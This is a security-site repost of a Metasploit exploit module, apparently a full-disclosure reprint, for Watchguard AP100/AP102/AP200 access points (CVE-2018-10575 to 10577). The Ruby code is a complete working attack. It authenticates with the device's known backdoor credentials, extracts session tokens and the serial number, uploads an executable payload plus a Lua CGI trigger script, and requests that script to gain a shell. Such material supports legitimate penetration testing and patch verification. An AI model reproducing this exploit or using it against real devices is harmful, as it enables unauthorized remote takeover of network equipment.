首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)
来源:metasploit.com 作者:Shkardoon 发布时间:2018-09-17  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Watchguard AP Backdoor Shell',
      'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
                        gain a valid web session on the HTTP administration interface. The administrator
                        can then upload a shell directly to the web root to execute it.
                        This module can also be used if you have legitimate access credentials to the device.',
      'References'  =>
        [
            ['CVE', 'CVE-2018-10575'],
        ['CVE', 'CVE-2018-10576'],
        ['CVE', 'CVE-2018-10577'],
            ['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
        ['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
        ],
      'Author'      => 'Stephen Shkardoon ', # ss23 / @ss2342
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Targets'        => [ [ 'Automatic', { } ] ],
      'DefaultTarget'  => 0,
      'Arch'           => ARCH_MIPSBE,
    ))
 
    register_options(
      [
        Opt::RPORT(443),
        #Opt::SSL(true),
        OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
        OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
      ])
  end
 
  def exploit
  begin
    res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => '/cgi-bin/luci/',
        'headers' => {
          'AUTH_USER' => datastore['WG_USER'],
          'AUTH_PASS' => datastore['WG_PASS'],
        },
      })
 
    if res.nil? || res.get_cookies.empty?
        fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
      end
      
      # We have a valid session, so we should pull out the access credentials and find the serial number
      sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
    stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
    
      vprint_status("Got sysauth #{sysauth}")
    vprint_status("Got stok #{stok}")
    
    res = send_request_cgi({
        'method'    => 'GET',
        'uri'       => "/cgi-bin/luci/;#{stok}/html/Status",
        'headers' => {
          'AUTH_USER' => datastore['WG_USER'],
          'AUTH_PASS' => datastore['WG_PASS'],
        },
        'cookie'    => sysauth,
      })
    
    if res.nil? || res.code != 200
      fail_with(Failure::NotFound, 'Unable to request serial')
      end
    
    # Pull out the serial and store it for later
    # var   device_serial = "20AP0XXXXXXXX";
    if res.body.match(/device_serial = "(\w+)";/)
      serial = $1
    else
      fail_with(Failure::NotFound, 'Unable to find serial in response')
    end
    
    vprint_status("Got serial #{serial}")
 
    # Finally, upload our payloads
    res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => "/cgi-bin/luci/;#{stok}/wgupload",
        'headers' => {
          'AUTH_USER' => datastore['WG_USER'],
          'AUTH_PASS' => datastore['WG_PASS'],
        },
        'cookie'    => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
        'data'      => payload.encoded_exe,
      })
 
    if res.nil? || res.code != 205
      fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
    end
  
    # Upload the lua script that executes our payload
    res = send_request_cgi({
        'method'    => 'POST',
        'uri'       => "/cgi-bin/luci/;#{stok}/wgupload",
        'headers' => {
          'AUTH_USER' => datastore['WG_USER'],
          'AUTH_PASS' => datastore['WG_PASS'],
        },
        'cookie'    => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
        'data'     => "#!/usr/bin/lua
os.execute('/bin/chmod +x /tmp/payload');      
os.execute('/tmp/payload');"
      })
    
    if res.nil? || res.code != 205
      fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
    end
    
    # Remove the trigger script once we've got a shell
    register_file_for_cleanup("/www/cgi-bin/payload.luci")
    
    vprint_status("Uploaded lua script")
    
    # Trigger our payload
    res = send_request_cgi({
        'method'    => 'GET',
        'uri'       => "/cgi-bin/payload.luci",
      })
      
    vprint_status("Requested lua payload")
    
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error("Failed to connect to the web server")
      return nil
    end
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Socusoft Photo to Video Conver
·CdBurnerXP 4.5.8.6795 - 'File
·TeamViewer App 13.0.100.0 - De
·InfraRecorder 0.53 - '.txt' De
·Free MP3 CD Ripper 2.6 - '.mp3
·Faleemi Plus 1.0.2 - Denial of
·Faleemi Desktop Software 1.8.2
·XAMPP Control Panel 3.2.2 - De
·STOPzilla AntiMalware 6.5.2.59
·Notebook Pro 2.0 - Denial Of S
·MediaTek Wirless Utility rt287
·Apache Syncope 2.0.7 Remote Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved